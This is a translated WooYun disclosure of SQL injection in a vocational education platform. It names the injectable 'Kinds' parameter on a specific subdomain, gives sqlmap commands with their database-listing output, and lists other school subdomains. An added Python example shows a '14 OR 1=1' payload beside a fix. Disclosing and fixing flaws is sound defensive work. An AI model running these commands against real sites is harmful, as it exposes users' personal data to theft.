
Vulnerability summary

Defect ID: wooyun-2014-079049

Title: SQL injection in a large learning platform, 3 million+ email records

Related vendor: cncert (National Internet Emergency Center)

Author: answer

Submitted: 2014-10-27 10:16

Fixed: 2014-12-11 10:18

Published: 2014-12-11 10:18

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Handed over to a third-party partner organization (cncert National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-10-27: Details sent to the vendor, awaiting vendor handling
2014-10-31: Vendor has confirmed; details disclosed only to the vendor
2014-11-10: Details disclosed to core white hats and domain experts
2014-11-20: Details disclosed to regular white hats
2014-11-30: Details disclosed to intern white hats
2014-12-11: Details disclosed to the public

Brief description:

If it won't be rated as a generic vulnerability, at least give me one front-end one.

Detailed description:

Name: Jincin vocational education platform
The volume of information is huge.
Email addresses alone are estimated at 3 million+; the other databases have not been explored further.
Official site: http://www.jincin.com/index.htm
Click into the school spaces:

[screenshot]


300+ universities.
Pick a school at random: tjtc.jincin.com
Injection point: /information/infor.htm?firstTF=1&Kinds=14&searchName=职场要闻&ResourceId=1 (the Kinds parameter is injectable)
Automated with sqlmap:
sqlmap -u "tjtc.jincin.com/information/infor.htm?firstTF=1&Kinds=14&searchName=职场要闻&ResourceId=1" --dbs
100+ databases:
available databases [101]:
[*] Advertisement
[*] Base
[*] Comm
[*] Comm0
[*] Comm1
[*] Comm2
[*] Comm3
[*] Comm4
[*] Creative
[*] Creative0
[*] Creative1
[*] Creative2
[*] Creative3
[*] Creative4
[*] File0
[*] File1
[*] File2
[*] File3
[*] File4
[*] Gov0
[*] Gov1
[*] Gov2
[*] Gov3
[*] Gov4
[*] iforum
[*] IM
[*] IM0
[*] IM1
[*] IM2
[*] IM3
[*] IM4
[*] Information
[*] information_schema
[*] JincinEDU
[*] Meeting
[*] MeetingN
[*] MeetingN0
[*] MeetingN1
[*] mysql
[*] performance_schema
[*] Preservice
[*] Preservice0
[*] Preservice1
[*] Preservice2
[*] Preservice3
[*] Preservice4
[*] QunSpace
[*] QunSpace0
[*] QunSpace1
[*] QunSpace2
[*] QunSpace3
[*] QunSpace4
[*] RealTrain
[*] RealTrain0
[*] RealTrain1
[*] RealTrain2
[*] RealTrain3
[*] RealTrain4
[*] Report
[*] Report0
[*] Report1
[*] Report2
[*] Report3
[*] Report4
[*] School
[*] School0
[*] School1
[*] School2
[*] School3
[*] School4
[*] SoftCenter
[*] SysDB
[*] TeachAssist
[*] TeachAssist0
[*] TeachAssist1
[*] TeachAssist2
[*] TeachAssist3
[*] TeachAssist4
[*] TeachContent
[*] TeachContent0
[*] TeachContent1
[*] TeachContent2
[*] TeachContent3
[*] TeachContent4
[*] test
[*] Training0
[*] Training1
[*] Training2
[*] Training3
[*] Training4
[*] User0
[*] User1
[*] User2
[*] User3
[*] User4
[*] UserSpace
[*] UserSpace0
[*] UserSpace1
[*] UserSpace2
[*] UserSpace3
[*] UserSpace4
Pick the User0 database (to show that the user base is large and the impact severe; this one seems to hold mainly email addresses, and there are 5 such databases in total):
sqlmap -u "tjtc.jincin.com/information/infor.htm?firstTF=1&Kinds=14&searchName=职场要闻&ResourceId=1" -D "User0" --tables
600+ tables

[screenshot]


Now look at how many columns one table has:
1000+ columns

[screenshot]


The column contents are email addresses:

[screenshot]


(Shown only as an illustration of the format; there is far too much.)
5 databases × 600 tables × 1000 columns: more than 3 million records.
Also stumbled upon this by chance:

[screenshot]


The other databases have not been explored; there is surely more data.
A few randomly chosen schools, for review:
tjtc.jincin.com
cwcsb.jincin.com
http://cuc.jincin.com/
http://pku.jincin.com/
http://bucea.jincin.com/
http://bjypc.jincin.com/
http://cauc.jincin.com/
http://ruc.jincin.com/
http://muc.jincin.com/
............
http://bit.jincin.com/

Proof of vulnerability: (same content as the detailed description above)


Fix:

Filter the input.
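The fix recommended above is input filtering. As an added example, not code from the original report or from the platform, this Python snippet contrasts a query that splices the Kinds parameter into SQL text with one that validates Kinds as a small integer and binds it as a parameter; the table schema and the sqlite3 backend are assumptions standing in for the platform's MySQL database.

```python
import sqlite3

# Constructed in-memory stand-in for the platform's content table.
# The real schema and the MySQL backend are unknown; this is an assumption.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE infor (id INTEGER, kinds INTEGER, title TEXT)")
    conn.executemany(
        "INSERT INTO infor VALUES (?, ?, ?)",
        [(1, 14, "career news A"), (2, 14, "career news B"), (3, 7, "unpublished item")],
    )
    return conn

def query_vulnerable(conn, kinds):
    # The Kinds value from the query string becomes SQL text: whatever the
    # client sends is executed as part of the statement.
    sql = f"SELECT id, title FROM infor WHERE kinds = {kinds}"
    return conn.execute(sql).fetchall()

def parse_kinds(raw):
    # Whitelist validation: Kinds is a category id, so only a short run of
    # ASCII digits is acceptable. Everything else is rejected before any SQL.
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 6):
        raise ValueError(f"rejected Kinds value: {raw!r}")
    return int(raw)

def query_hardened(conn, raw_kinds):
    # Validate first, then bind as a parameter so the value can never change
    # the statement structure, even if the validation is loosened later.
    kinds = parse_kinds(raw_kinds)
    return conn.execute(
        "SELECT id, title FROM infor WHERE kinds = ?", (kinds,)
    ).fetchall()

if __name__ == "__main__":
    db = build_db()
    print(query_vulnerable(db, "14"))         # 2 rows
    print(query_vulnerable(db, "14 OR 1=1"))  # all 3 rows: the condition was rewritten
    print(query_hardened(db, "14"))           # 2 rows
    try:
        query_hardened(db, "14 OR 1=1")
    except ValueError as e:
        print(e)                              # rejected before any SQL runs
```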

Copyright notice: please credit the source when reposting, answer@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 20

Confirmed: 2014-10-31 17:42

Vendor reply:

Latest status:

None yet